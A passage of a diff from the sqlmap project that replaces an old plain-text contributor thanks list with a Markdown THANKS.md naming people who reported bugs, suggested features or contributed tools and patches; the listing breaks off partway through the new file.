-
-Mounir Idrassi <mounir.idrassi@idrix.net>
-    for his compiled version of UPX for Mac OS X
-
-Daliev Ilya <daliser@yandex.ru>
-    for reporting a bug
-
-Prashant Jadhav <prashantjadhav.82@gmail.com>
-    for reporting a bug
-
-Dirk Jagdmann <doj@cubic.org>
-    for reporting a typo in the documentation
-
-Luke Jahnke <luke.jahnke@gmail.com>
-    for reporting a bug when running against MySQL < 5.0
-
-David Klein <david.klein@ipfocus.com.au>
-    for reporting a minor code improvement
-
-Sven Klemm <sven@c3d2.de>
-    for reporting two minor bugs with PostgreSQL
-
-Anant Kochhar <anant.kochhar@secureyes.net>
-    for providing me with feedback on the user's manual
-
-Alexander Kornbrust <ak@red-database-security.com>
-    for reporting a couple of bugs
-
-Krzysztof Kotowicz <kkotowicz@gmail.com>
-    for reporting a minor bug
-
-Nicolas Krassas <krasn@ans.gr>
-    for reporting a bug
-
-Alex Landa <landa.alex86@gmail.com>
-    for providing a patch adding support for XML output
-
-Guido Landi <lists@keamera.org>
-    for reporting a couple of bugs
-    for the great technical discussions
-    for Microsoft SQL Server 2000 and Microsoft SQL Server 2005
-    'sp_replwritetovarbin' stored procedure heap-based buffer overflow
-    (MS09-004) exploit development
-    for presenting with me at SOURCE Conference 2009 in Barcelona (Spain)
-    on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on
-    November 20, 2009
-
-Lee Lawson <Lee.Lawson@dns.co.uk>
-    for reporting a minor bug
-
-John J. Lee <jjl@pobox.com> & others
-    for developing the clientform Python library used by sqlmap to parse
-    forms when --forms switch is specified
-
-Nico Leidecker <nico@leidecker.info>
-    for providing me with feedback on a few features
-    for reporting a couple of bugs
-    for his great tool icmpsh included in sqlmap tree to get a command
-    prompt via an out-of-band tunnel over ICMP,
-    http://leidecker.info/downloads/icmpsh.zip
-
-Gabriel Lima <pato@bugnet.com.br>
-    for reporting a couple of bugs
-
-Svyatoslav Lisin <sel@3d-tech.ru>
-    for suggesting a minor feature
-
-Mark Lowe <larkmowe@gmail.com>
-    for reporting a couple of bugs
-
-Truong Duc Luong <luongductruong@gmail.com>
-    for reporting a minor bug
-
-Pavol Luptak <pavol.luptak@nethemba.com>
-    for reporting a bug when injecting on a POST data parameter
-
-Michael Majchrowicz <mmajchrowicz@gmail.com>
-    for extensively beta-testing sqlmap on various MySQL DBMS
-    for providing really appreciated feedback
-    for suggesting a lot of ideas and features
-
-Ferruh Mavituna <ferruh@mavituna.com>
-    for providing me with ideas on the implementation of a couple of
-    new features
-
-David McNab <david@conscious.co.nz>
-    for his XMLObject module that allows XML files to be operated on 
-    like Python objects
-
-Spencer J. McIntyre <smcintyre@securestate.com>
-    for reporting a minor bug
-
-Enrico Milanese <enricomilanese@gmail.com>
-    for reporting a bugs when using (-a) a single line User-Agent file
-    for providing me with some ideas for the PHP backdoor
-
-Anton Mogilin <azarmaster81@yahoo.com>
-    for reporting a few bugs
-
-Anastasios Monachos <anastasiosm@gmail.com>
-    for providing some useful data
-    for suggesting a feature
-
-Kirill Morozov <l0rda@l0rda.biz>
-    for reporting a bug
-    for suggesting a feature
-
-Alejo Murillo Moya <alex@65535.com>
-    for reporting a minor bug
-    for suggesting a few features
-
-Yonny Mutai <yonnym@googlemail.com>
-    for reporting a minor bug
-
-Roberto Nemirovsky <roberto.paes@gmail.com>
-    for pointing me out some enhancements
-
-Markus Oberhumer <markus.oberhumer@jk.uni-linz.ac.at>
-Laszlo Molnar <ml1050@cdata.tvnet.hu>
-John F. Reiser <sales@bitwagon.com>
-    for their great tool UPX (Ultimate Packer for eXecutables) included
-    in sqlmap tree as a contrib library and used mainly to pack the
-    Metasploit Framework 3 payload stager portable executable,
-    http://upx.sourceforge.net
-
-Simone Onofri <simone.onofri@gmail.com>
-    for patching the PHP web backdoor to make it work properly also on
-    Windows
-
-Shaohua Pan <pan@knownsec.com>
-    for reporting several bugs
-    for suggesting a few features
-
-Antonio Parata <s4tan@ictsc.it>
-    for providing me with some ideas for the PHP backdoor
-
-Adrian Pastor <ap@gnucitizen.org>
-    for donating to sqlmap development
-
-Chris Patten <cpatten@sunera.com>
-    for reporting a bug in the blind SQL injection bisection algorithm
-
-Zack Payton <zack.payton@executiveinstruments.com>
-    for reporting a minor bug
-
-Steve Pinkham <steve.pinkham@gmail.com>
-    for suggesting a feature
-    for providing a new sql injection vector (MSSQL time based)
-
-Adam Pridgen <adam.pridgen@gmail.com>
-    for suggesting some features
-
-Ole Rasmussen <olerass@gmail.com>
-    for reporting a bug
-    for suggesting a feature
-
-Alberto Revelli <r00t@northernfortress.net>
-    for inspiring me to write sqlmap user's manual in SGML
-    for his great Microsoft SQL Server take over tool, sqlninja,
-    http://sqlninja.sourceforge.net
-
-Andres Riancho <andres.riancho@gmail.com>
-    for beta-testing sqlmap
-    for reporting a bug and suggesting some features
-    for including sqlmap in his great web application audit and attack
-    framework, w3af, http://w3af.sourceforge.net
-    for suggesting a way for handling DNS caching
-
-Antonio Riva <antonio.riva@gmail.com>
-    for reporting a bug when running with python 2.5
-
-Ethan Robish <ethan.robish@gmail.com>
-    for reporting a bug
-
-Andrea Rossi <andyroyalbattle@yahoo.it>
-    for reporting a minor bug
-    for suggesting a feature
-
-Richard Safran <allapplyhere@yahoo.com>
-    for donating the sqlmap.org domain control
-
-Tomoyuki Sakurai <cherry@trombik.org>
-    for submitting to the FreeBSD project the sqlmap 0.5 port
-
-Pedro Jacques Santos Santiago <pedro__jacques@hotmail.com>
-    for reporting several bugs
-
-Marek Sarvas <marek.sarvas@gmail.com>
-    for reporting several bugs
-
-Philippe A. R. Schaeffer <schaeff@compuphil.de>
-    for reporting a minor bug
-
-Jorge Santos <jorge_a_santos@hotmail.com>
-    for reporting a minor bug
-
-Sven Schluter <sschlueter@netzwerk.cc>
-    for providing with a patch for waiting a number of seconds between
-    each HTTP request
-
-Ryan Sears <rdsears@mtu.edu>
-    for suggesting a couple of enhancements
-
-Uemit Seren <uemit.seren@gmail.com>
-    for reporting a minor adjustment when running with python 2.6
-
-Ahmed Shawky <ahmed@isecur1ty.org>
-    for reporting a major bug with improper handling of parameter values
-    for reporting a bug
-
-Brian Shura <bshura@appsecconsulting.com>
-    for reporting a bug
-
-Sumit Siddharth <sid@notsosecure.com>
-    for providing me with ideas on the implementation of a couple of
-    features
-
-Andre Silva <andreoaz@gmail.com>
-    for reporting a bug
-
-M Simkin <mlsimkin@cox.net>
-    for suggesting a feature
-
-Konrads Smelkovs <konrads@smelkovs.com>
-    for reporting a few bugs in --sql-shell and --sql-query on Microsoft
-    SQL Server
-
-Michael D. Stenner <mstenner@linux.duke.edu>
-    for his keepalive module that allows handling of persistent 
-    HTTP 1.1 keep-alive connections
-
-Marek Stiefenhofer <m.stiefenhofer@r-tec.net>
-    for reporting a bug
-
-Jason Swan <jasoneswan@gmail.com>
-    for reporting a bug when enumerating columns on Microsoft SQL Server
-    for suggesting a couple of improvements
-
-Chilik Tamir <phenoman@gmail.com>
-    for providing a patch for initial support SOAP requests
-
-Alessandro Tanasi <alessandro@tanasi.it>
-    for extensively beta-testing sqlmap
-    for suggesting many features and reporting some bugs
-    for reviewing the documentation
-
-Andres Tarasco <atarasco@gmail.com>
-    for providing me with good feedback
-
-Kazim Bugra Tombul <mhackmail@gmail.com>
-    for reporting a minor bug
-
-Efrain Torres <et@metasploit.com>
-    for helping me out to improve the Metasploit Framework 3 sqlmap
-    auxiliary module and for commiting it on the Metasploit official
-    subversion repository
-    for his great Metasploit WMAP Framework
-
-Sandro Tosi <matrixhasu@gmail.com>
-    for helping to create sqlmap Debian package correctly
-
-Vitaly Turenko <dsu@dsu.com.ua>
-    for reporting a bug
-
-Augusto Urbieta <x2xpy50@gmail.com>
-    for reporting a minor bug
-
-Bedirhan Urgun <bedirhanurgun@gmail.com>
-    for reporting a few bugs
-    for suggesting some features and improvements
-    for benchmarking sqlmap in the context of his SQL injection
-    benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
-
-Kyprianos Vasilopoulos <kyprianos.vasilopoulos@gmail.com>
-    for reporting a couple of minor bugs
-
-Carlos Gabriel Vergara <carlosgabrielvergara@gmail.com>
-    for suggesting couple of good features
-
-Anthony Zboralski <anthony.zboralski@bellua.com>
-    for providing me with detailed feedback
-    for reporting a few minor bugs
-    for donating to sqlmap development
-
-Thierry Zoller <thierry@zoller.lu>
-    for reporting a couple of major bugs
-
--insane- <insane_@gmx.de>
-    for reporting a minor bug
-
-abc abc <biedimc@gmx.net>
-    for reporting a minor bug
-
-Brandon E. <brandonpoc@gmail.com>
-    for reporting a bug
-
-black zero <timeisflowing@gmail.com>
-    for reporting a minor bug
-
-buawig <buawig@gmail.com>
-    for reporting considerable amount of bugs
-
-Bugtrace <bugtrace@gmail.com>
-    for reporting several bugs
-
-dragoun dash <dragoun.dash@gmail.com>
-    for reporting a minor bug
-	
-fufuh <fufuh@users.sourceforge.net>
-    for reporting a bug when running on Windows
-
-james <james@ev6.net>
-    for reporting a bug
-
-m4l1c3 <malice.anon@gmail.com>
-    for reporting considerable amount of bugs
-
-mariano <marianoso@gmail.com>
-    for reporting a bug
-
-mitchell <mitchell@tufala.net>
-    for reporting a bug
-
-nightman <nightman@email.de>
-    for reporting several bugs
-
-pacman730 <pacman730@users.sourceforge.net>
-    for reporting a bug
-
-Phat R. <phatthanaphol@gmail.com>
-    for reporting a minor bug
-
-Joe "Pragmatk" <pragmatk@gmail.com>
-    for reporting a few bugs
-
-ragos <ragos@joker.ms>
-    for reporting a minor bug
-
-shiftzwei <shiftzwei@gmail.com>
-    for reporting a couple of bugs
-
-Stuffe <stuffe.dk@gmail.com>
-    for reporting a minor bug and a feature request
-
-Sylphid <sylphid.su@sti.com.tw>
-    for suggesting some features
-
-syssecurity.info <syssecurity7@googlemail.com>
-    for reporting a minor bug
-
-ToR <sstidus@email.it>
-    for reporting considerable amount of bugs
-    for suggesting a feature
-
-ultramegaman <seclists@ultramegaman.com>
-    for reporting a minor bug
-
-wanglei <wanglei@17uxi.cn>
-    for reporting a minor bug
-
-warninggp <warninggp@gmail.com>
-    for reporting a few minor bugs
-
-x <deep_freeze@mail.ru>
-    for reporting a bug
-
-== Organizations ==
-
-Black Hat team <info@blackhat.com>
-    for the opportunity to present my research on 'Advanced SQL injection
-    to operating system full control' at Black Hat Europe 2009 Briefings on
-    April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of
-    the sqlmap 0.7 release candidate version new features during my
-    presentation
-
-Metasploit LLC <msfdev@metasploit.com>
-    for their powerful tool Metasploit Framework 3, used by sqlmap, among
-    others things, to create the shellcode and establish an out-of-band
-    connection between sqlmap and the database server,
-    http://www.metasploit.com/framework
-
-OWASP Board <http://www.owasp.org>
-    for sponsoring part of the sqlmap development in the context of OWASP
-    Spring of Code 2007

doc/THANKS.md

@@ -0,0 +1,799 @@
+# Individuals
+
+Andres Tarasco Acuna, <atarasco(at)gmail.com>
+* for suggesting a feature
+
+Santiago Accurso, <saccurso(at)skygear.com.ar>
+* for reporting a bug
+
+Syed Afzal, <syed(at)syedafzal.in>
+* for contributing a WAF script varnish.py
+
+Zaki Akhmad, <zakiakhmad(at)gmail.com>
+* for suggesting a couple of features
+
+Olu Akindeinde, <seyi.akin(at)gmail.com>
+* for reporting a couple of bugs
+
+David Alvarez, <david.alvarez.s(at)gmail.com>
+* for reporting a bug
+
+Sergio Alves, <sergioalexandre.alves(at)gmail.com>
+* for reporting a bug
+
+Thomas Anderson, <darkc0de(at)live.com.ph>
+* for reporting a bug
+
+Chip Andrews, <chip(at)sqlsecurity.com>
+* for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site
+
+Smith Andy, <teh.one(at)hotmail.com>
+* for suggesting a feature
+
+Otavio Augusto, <otavioarj(at)gmail.com>
+* for reporting a minor bug
+
+Simon Baker, <simonb(at)sec-1.com>
+* for reporting some bugs
+
+Ryan Barnett, <RBarnett(at)trustwave.com>
+* for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html
+
+Emiliano Bazaes, <emiliano(at)7espejos.com>
+* for reporting a minor bug
+
+Daniele Bellucci, <daniele.bellucci(at)gmail.com>
+* for starting sqlmap project and developing it between July and August 2006
+
+Sebastian Bittig, <s.bittig(at)r-tec.net> and the rest of the team at r-tec IT Systeme GmbH
+* for contributing the DB2 support initial patch: fingerprint and enumeration
+
+Anthony Boynes, <aboynes(at)gmail.com>
+* for reporting several bugs
+
+Marcelo Toscani Brandao
+* for reporting a bug
+
+Velky Brat, <velkybrat(at)gmail.com>
+* for suggesting a minor enhancement to the bisection algorithm
+
+James Briggs, <james.briggs(at)ngssecure.com>
+* for suggesting a minor enhancement
+
+Gianluca Brindisi, <g(at)brindi.si>
+* for reporting a couple of bugs
+
+Jack Butler, <fattredd(at)hotmail.com>
+* for contributing the sqlmap site favicon
+
+Ulisses Castro, <uss.thebug(at)gmail.com>
+* for reporting a bug
+
+Roberto Castrogiovanni, <castrogiovanni.roberto(at)gmail.com>
+* for reporting a minor bug
+
+Cesar Cerrudo, <cesar(at)argeniss.com>
+* for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf
+
+Karl Chen, <quarl(at)cs.berkeley.edu>
+* for contributing the initial multi-threading patch for the inference algorithm
+
+Y P Chien, <ypchien(at)cox.net>
+* for reporting a minor bug
+
+Pierre Chifflier, <pollux(at)debian.org> and Mark Hymers, <ftpmaster(at)debian.org>
+* for uploading and accepting the sqlmap Debian package to the official Debian project repository
+
+Hysia Chow <hysia(at)icloud.com>
+* for contributing a couple of WAF scripts
+
+Chris Clements, <cclements(at)flatearth.net>
+* for reporting a couple of bugs
+
+John Cobb, <johnc(at)nobytes.com>
+* for reporting a minor bug
+
+Andreas Constantinides, <megahz(at)megahz.org>
+* for reporting a minor bug
+
+Andre Costa, <andre.investorsclub(at)gmail.com>
+* for reporting a minor bug
+* for suggesting a minor enhancement
+
+Ulises U. Cune, <ulises2k(at)gmail.com>
+* for reporting a bug
+
+Alessandro Curio, <alessandro.curio(at)gmail.com>
+* for reporting a minor bug
+
+Alessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>
+* for reporting a couple of bugs
+
+Sherif El-Deeb, <archeldeeb(at)gmail.com>
+* for reporting a minor bug
+
+Stefano Di Paola, <stefano.dipaola(at)wisec.it>
+* for suggesting good features
+
+Mosk Dmitri, <ya(at)darkbyte.ru>
+* for reporting a minor bug
+
+Meng Dong, <whenov(at)gmail.com>
+* for contributing a code for Waffit integration
+
+Carey Evans, <careye(at)spamcop.net>
+* for his fcrypt module that allows crypt(3) support
+    on Windows platforms
+
+Shawn Evans, <shawndevans(at)gmail.com>
+* for suggesting an idea for one tamper script, greatest.py
+
+Adam Faheem, <faheem.adam(at)is.co.za>
+* for reporting a few bugs
+
+James Fisher, <www(at)sittinglittleduck.com>
+* for contributing two very good feature requests
+* for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster
+
+Jim Forster, <jimforster(at)goldenwest.com>
+* for reporting a bug
+
+Rong-En Fan, <rafan(at)freebsd.org>
+* for committing the sqlmap 0.5 port to the official FreeBSD project repository
+
+Giorgio Fedon, <giorgio.fedon(at)gmail.com>
+* for suggesting a speed improvement for bisection algorithm
+* for reporting a bug when running against Microsoft SQL Server 2005
+
+Kasper Fons, <thefeds(at)mail.dk>
+* for reporting several bugs
+
+Jose Fonseca, <jose.r.fonseca(at)gmail.com>
+* for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only
+    http://code.google.com/p/jrfonseca/wiki/Gprof2Dot
+    http://code.google.com/p/jrfonseca/wiki/XDot
+
+Alan Franzoni, <alan.franzoni(at)gmail.com>
+* for helping out with Python subprocess library
+
+Harold Fry, <harold(at)violaceo.us>
+* for suggesting a minor enhancement
+
+Daniel G. Gamonal, <lgrecol(at)gmail.com>
+* for reporting a minor bug
+
+Marcos Mateos Garcia, <mmateos(at)germinus.com>
+* for reporting a minor bug
+
+Andrew Gecse, <andrew.gecse(at)upcmail.hu>
+* for reporting a minor issue
+
+Ivan Giacomelli, <truemilk(at)insiberia.net>
+* for reporting a bug
+* for suggesting a minor enhancement
+* for reviewing the documentation
+
+Dimitris Giannitsaros, <daremon(at)gmail.com>
+* for contributing a REST-JSON API client
+
+Nico Golde, <nico(at)ngolde.de>
+* for reporting a couple of bugs
+
+Oliver Gruskovnjak, <oliver.gruskovnjak(at)gmail.com>
+* for reporting a bug
+* for contributing a minor patch
+
+Davide Guerri, <d.guerri(at)caspur.it>
+* for suggesting an enhancement
+
+Dan Guido, <dguido(at)gmail.com>
+* for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/
+
+David Guimaraes, <skysbsb(at)gmail.com>
+* for reporting considerable amount of bugs
+* for suggesting several features
+
+Chris Hall, <chris.hall(at)mod10.net>
+* for coding the prettyprint.py library
+
+Tate Hansen, <tate(at)clearnetsec.com>
+* for donating to sqlmap development
+
+Mario Heiderich, <mario.heiderich(at)gmail.com>
+Christian Matthies, <ch0012(at)gmail.com>
+Lars H. Strojny, <lars(at)strojny.net>
+* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org
+
+Kristian Erik Hermansen, <kristian.hermansen(at)gmail.com>
+* for reporting a bug
+* for donating to sqlmap development
+
+Alexander Hagenah, <ah(at)primepage.de>
+* for reporting a minor bug
+
+Dennis Hecken, <mail(at)8dh.de>
+* for reporting a minor bug
+
+Choi Ho, <counterhacker815(at)gmail.com>
+* for reporting a minor bug
+
+Jorge Hoya, <aquinadie(at)gmail.com>
+* for suggesting a minor enhancement
+
+Will Holcomb, <wholcomb(at)gmail.com>
+* for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code
+
+Daniel Huckmann, <sanitybit(at)gmail.com>
+* for reporting a couple of bugs
+
+Daliev Ilya, <daliser(at)yandex.ru>
+* for reporting a bug
+
+Mehmet İnce, <mehmet(at)mehmetince.net>
+* for contributing a tamper script xforwardedfor.py
+
+Jovon Itwaru, <jovon.itwaru(at)gmail.com>
+* for reporting a minor bug
+
+Prashant Jadhav, <prashantjadhav.82(at)gmail.com>
+* for reporting a bug
+
+Dirk Jagdmann, <doj(at)cubic.org>
+* for reporting a typo in the documentation
+
+Luke Jahnke, <luke.jahnke(at)gmail.com>
+* for reporting a bug when running against MySQL < 5.0
+
+Andrew Kitis <andrew.kitis(at)gmail.com>
+* for contributing a tamper script lowercase.py
+
+David Klein, <david.klein(at)ipfocus.com.au>
+* for reporting a minor code improvement
+
+Sven Klemm, <sven(at)c3d2.de>
+* for reporting two minor bugs with PostgreSQL
+
+Anant Kochhar, <anant.kochhar(at)secureyes.net>
+* for providing with feedback on the user's manual
+
+Dmitriy Kononov, <dmitriyknnv(at)gmail.com>
+* for reporting a minor bug
+
+Alexander Kornbrust, <ak(at)red-database-security.com>
+* for reporting a couple of bugs
+
+Krzysztof Kotowicz, <kkotowicz(at)gmail.com>
+* for reporting a minor bug
+
+Nicolas Krassas, <krasn(at)deventum.com>
+* for reporting a couple of bugs
+
+Oliver Kuckertz, <oliver.kuckertz(at)mologie.de>
+* for contributing a minor patch
+
+Alex Landa, <landa.alex86(at)gmail.com>
+* for contributing a patch adding beta support for XML output
+
+Guido Landi, <lists(at)keamera.org>
+* for reporting a couple of bugs
+* for the great technical discussions
+* for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development
+* for presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009
+
+Lee Lawson, <Lee.Lawson(at)dns.co.uk>
+* for reporting a minor bug
+
+John J. Lee, <jjl(at)pobox.com> and others
+* for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified
+
+Nico Leidecker, <nico(at)leidecker.info>
+* for providing with feedback on a few features
+* for reporting a couple of bugs
+* for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip
+
+Gabriel Lima, <pato(at)bugnet.com.br>
+* for reporting a couple of bugs
+
+Svyatoslav Lisin, <sel(at)3d-tech.ru>
+* for suggesting a minor feature
+
+Miguel Lopes, <theoverblue(at)gmail.com>
+* for reporting a minor bug
+
+Truong Duc Luong, <luongductruong(at)gmail.com>
+* for reporting a minor bug
+
+Pavol Luptak, <pavol.luptak(at)nethemba.com>
+* for reporting a bug when injecting on a POST data parameter
+
+Till Maas, <opensource(at)till.name>
+* for suggesting a minor feature
+
+Michael Majchrowicz, <mmajchrowicz(at)gmail.com>
+* for extensively beta-testing sqlmap on various MySQL DBMS
+* for providing really appreciated feedback
+* for suggesting a lot of ideas and features
+
+Vinícius Henrique Marangoni, <vinicius_marangoni1(at)hotmail.com>
+* for contributing a Portuguese translation of README.md
+
+Ahmad Maulana, <matdhule(at)gmail.com>
+* for contributing a tamper script halfversionedmorekeywords.py
+
+Ferruh Mavituna, <ferruh(at)mavituna.com>
+* for exchanging ideas on the implementation of a couple of features
+
+David McNab, <david(at)conscious.co.nz>
+* for his XMLObject module that allows XML files to be operated on  like Python objects
+
+Spencer J. McIntyre, <smcintyre(at)securestate.com>
+* for reporting a minor bug
+* for contributing a patch for OS fingerprinting on DB2
+
+Brad Merrell, <bradmer12(at)gmail.com>
+* for reporting a minor bug
+
+Michael Meyer, <m.meyer2k(at)gmail.com>
+* for suggesting a minor feature
+
+Enrico Milanese, <enricomilanese(at)gmail.com>
+* for reporting a minor bug
+* for sharing some ideas for the PHP backdoor
+
+Liran Mimoni, <reactor.leet(at)gmail.com>
+* for reporting a minor bug
+
+Marco Mirandola, <mmmccc0(at)gmail.com>
+* for reporting a minor bug
+
+Devon Mitchell, <devon.mitchell1988(at)yahoo.com>
+* for reporting a minor bug
+
+Anton Mogilin, <azarmaster81(at)yahoo.com>
+* for reporting a few bugs
+
+Sergio Molina, <smolina(at)wpr.es>
+* for reporting a minor bug
+
+Anastasios Monachos, <anastasiosm(at)gmail.com>
+* for providing some useful data
+* for suggesting a feature
+* for reporting a couple of bugs
+
+Kirill Morozov, <l0rda(at)l0rda.biz>
+* for reporting a bug
+* for suggesting a feature
+
+Alejo Murillo Moya, <alex(at)65535.com>
+* for reporting a minor bug
+* for suggesting a few features
+
+Yonny Mutai, <yonnym(at)googlemail.com>
+* for reporting a minor bug
+
+Roberto Nemirovsky, <roberto.paes(at)gmail.com>
+* for pointing out some enhancements
+
+Sebastian Nerz, <sebastian.nerz(at)syss.de>
+* for reporting a (potential) vulnerability in --eval
+
+Simone Onofri, <simone.onofri(at)gmail.com>
+* for patching the PHP web backdoor to make it work properly also on Windows
+
+Michele Orru, <michele.orru(at)antisnatchor.com>
+* for reporting a couple of bug
+* for suggesting ideas on how to implement the RESTful API
+
+Shaohua Pan, <pan(at)knownsec.com>
+* for reporting several bugs
+* for suggesting a few features
+
+Antonio Parata, <s4tan(at)ictsc.it>
+* for sharing some ideas for the PHP backdoor
+
+Adrian Pastor, <ap(at)gnucitizen.org>
+* for donating to sqlmap development
+
+Christopher Patten, <cpatten(at)sunera.com>
+* for reporting a bug in the blind SQL injection bisection algorithm
+
+Zack Payton, <zack.payton(at)executiveinstruments.com>
+* for reporting a minor bug
+
+Jaime Penalba, <nighterman(at)painsec.com>
+* for contributing a patch for INSERT/UPDATE generic boundaries
+
+Pedrito Perez, <0ark1ang3l(at)gmail.com>
+* for reporting a couple of bugs
+
+Brandon Perry, <bperry.volatile(at)gmail.com>
+* for reporting a couple of bugs
+
+Travis Phillips, <perfect_insanity2004(at)yahoo.com>
+* for suggesting a minor enhancement
+
+Mark Pilgrim, <mark(at)diveintomark.org>
+* for porting chardet package (Universal Encoding Detector) to Python
+
+Steve Pinkham, <steve.pinkham(at)gmail.com>
+* for suggesting a feature
+* for contributing a new SQL injection vector (MSSQL time-based blind)
+* for donating to sqlmap development
+
+Adam Pridgen, <adam.pridgen(at)gmail.com>
+* for suggesting some features
+
+Luka Pusic, <luka(at)pusic.si>
+* for reporting a couple of bugs
+
+Ole Rasmussen, <olerass(at)gmail.com>
+* for reporting a bug
+* for suggesting a feature
+
+Alberto Revelli, <r00t(at)northernfortress.net>
+* for inspiring to write sqlmap user's manual in SGML
+* for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net
+
+David Rhoades, <david.rhoades(at)mavensecurity.com>
+* for reporting a bug
+
+Andres Riancho, <andres.riancho(at)gmail.com>
+* for beta-testing sqlmap
+* for reporting a bug and suggesting some features
+* for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net
+* for suggesting a way for handling DNS caching
+
+Jamie Riden, <jamie.riden(at)ngssecure.com>
+* for reporting a minor bug
+
+Alexander Rigbo, <alex(at)rigbo.se>
+* for contributing a minor patch
+
+Antonio Riva, <antonio.riva(at)gmail.com>
+* for reporting a bug when running with python 2.5
+
+Ethan Robish, <ethan.robish(at)gmail.com>
+* for reporting a bug
+
+Levente Rog, <levidos(at)gmail.com>
+* for reporting a minor bug
+
+Andrea Rossi, <andyroyalbattle(at)yahoo.it>
+* for reporting a minor bug
+* for suggesting a feature
+
+Frederic Roy, <frederic.roy(at)telindus.fr>
+* for reporting a couple of bugs
+
+Vladimir Rutsky, <rutsky.vladimir(at)gmail.com>
+* for suggesting a couple of minor enhancements
+
+Richard Safran, <allapplyhere(at)yahoo.com>
+* for donating the sqlmap.org domain
+
+Tomoyuki Sakurai, <cherry(at)trombik.org>
+* for submitting to the FreeBSD project the sqlmap 0.5 port
+
+Roberto Salgado, <lightos(at)gmail.com>
+* for contributing considerable amount of tamper scripts
+
+Pedro Jacques Santos Santiago, <pedro__jacques(at)hotmail.com>
+* for reporting considerable amount of bugs
+
+Marek Sarvas, <marek.sarvas(at)gmail.com>
+* for reporting several bugs
+
+Philippe A. R. Schaeffer, <schaeff(at)compuphil.de>
+* for reporting a minor bug
+
+Mohd Zamiri Sanin, <zamiri.sanin(at)gmail.com>
+* for reporting a minor bug
+
+Jorge Santos, <jorge_a_santos(at)hotmail.com>
+* for reporting a minor bug
+
+Sven Schluter, <sschlueter(at)netzwerk.cc>
+* for contributing a patch
+* for waiting a number of seconds between each HTTP request
+
+Ryan Sears, <rdsears(at)mtu.edu>
+* for suggesting a couple of enhancements
+* for donating to sqlmap development
+
+Uemit Seren, <uemit.seren(at)gmail.com>
+* for reporting a minor adjustment when running with python 2.6
+
+Shane Sewell, <ssewell(at)gmail.com>
+* for suggesting a feature
+
+Ahmed Shawky, <ahmed(at)isecur1ty.org>
+* for reporting a major bug with improper handling of parameter values
+* for reporting a bug
+
+Brian Shura, <bshura(at)appsecconsulting.com>
+* for reporting a bug
+
+Sumit Siddharth, <sid(at)notsosecure.com>
+* for sharing ideas on the implementation of a couple of features
+
+Andre Silva, <andreoaz(at)gmail.com>
+* for reporting a bug
+
+Benjamin Silva H. <silva96(at)gmail.com>
+* for reporting a bug
+
+Duarte Silva <duarte.silva(at)serializing.me>
+* for reporting a couple of bugs
+
+M Simkin, <mlsimkin(at)cox.net>
+* for suggesting a feature
+
+Konrads Smelkovs, <konrads(at)smelkovs.com>
+* for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server
+
+Chris Spencer, <chris.spencer(at)ngssecure.com>
+* for reviewing the user's manual grammar
+
+Michael D. Stenner, <mstenner(at)linux.duke.edu>
+* for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections
+
+Marek Stiefenhofer, <m.stiefenhofer(at)r-tec.net>
+* for reporting a few bugs
+
+Jason Swan, <jasoneswan(at)gmail.com>
+* for reporting a bug when enumerating columns on Microsoft SQL Server
+* for suggesting a couple of improvements
+
+Chilik Tamir, <phenoman(at)gmail.com>
+* for contributing a patch for initial support SOAP requests
+
+Alessandro Tanasi, <alessandro(at)tanasi.it>
+* for extensively beta-testing sqlmap
+* for suggesting many features and reporting some bugs
+* for reviewing the documentation
+
+Andres Tarasco, <atarasco(at)gmail.com>
+* for contributing good feedback
+
+Tom Thumb, <k1971(at)live.co.uk>
+* for reporting a major bug
+
+Kazim Bugra Tombul, <mhackmail(at)gmail.com>
+* for reporting a minor bug
+
+Efrain Torres, <et(at)metasploit.com>
+* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository
+* for his great Metasploit WMAP Framework
+
+Sandro Tosi, <matrixhasu(at)gmail.com>
+* for helping to create sqlmap Debian package correctly
+
+Jacco van Tuijl, <jaccovantuijl(at)gmail.com>
+* for reporting several bugs
+
+Vitaly Turenko, <dsu(at)dsu.com.ua>
+* for reporting a bug
+
+Augusto Urbieta, <x2xpy50(at)gmail.com>
+* for reporting a minor bug
+
+Bedirhan Urgun, <bedirhanurgun(at)gmail.com>
+* for reporting a few bugs
+* for suggesting some features and improvements
+* for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
+
+Kyprianos Vasilopoulos, <kyprianos.vasilopoulos(at)gmail.com>
+* for reporting a couple of minor bugs
+
+Vlado Velichkovski, <ketejadam(at)hotmail.com>
+* for reporting considerable amount of bugs
+* for suggesting an enhancement
+
+Johnny Venter, <johnny.venter(at)zoho.com>
+* for reporting a couple of bugs
+
+Carlos Gabriel Vergara, <carlosgabrielvergara(at)gmail.com>
+* for suggesting couple of good features
+
+Patrick Webster, <patrick(at)aushack.com>
